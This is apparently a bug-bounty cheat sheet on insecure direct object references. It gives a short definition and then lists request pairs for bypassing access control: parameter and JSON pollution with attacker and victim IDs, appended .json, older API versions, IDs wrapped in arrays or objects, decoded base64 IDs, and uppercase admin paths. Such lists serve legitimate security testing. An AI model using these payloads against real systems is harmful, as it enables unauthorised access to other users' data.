Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. The term IDOR was popularized by its appearance in the OWASP 2007 Top Ten. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.
- Add parameters onto the endpoints for example, if there was
GET /api/v1/getuser
[...]Try this to bypass
GET /api/v1/getuser?id=1234
[...]- HTTP Parameter pollution
POST /api/get_profile
[...]
user_id=hacker_id&user_id=victim_id- Add .json to the endpoint
GET /v2/GetData/1234
[...]Try this to bypass
GET /v2/GetData/1234.json
[...]- Test on outdated API Versions
POST /v2/GetData
[...]
id=123Try this to bypass
POST /v1/GetData
[...]
id=123- Wrap the ID with an array.
POST /api/get_profile
[...]
{"user_id":111}Try this to bypass
POST /api/get_profile
[...]
{"id":[111]}- Wrap the ID with a JSON object
POST /api/get_profile
[...]
{"user_id":111}Try this to bypass
POST /api/get_profile
[...]
{"user_id":{"user_id":111}}- JSON Parameter Pollution
POST /api/get_profile
[...]
{"user_id":"hacker_id","user_id":"victim_id"}- Try decode the ID, if the ID encoded using md5,base64,etc
GET /GetUser/dmljdGltQG1haWwuY29t
[...]dmljdGltQG1haWwuY29t => [email protected]
- If the website using graphql, try to find IDOR using graphql!
GET /graphql
[...]GET /graphql.php?query=
[...]- MFLAC (Missing Function Level Access Control)
GET /admin/profile
Try this to bypass
GET /ADMIN/profile
Source: @swaysThinking and other medium writeup!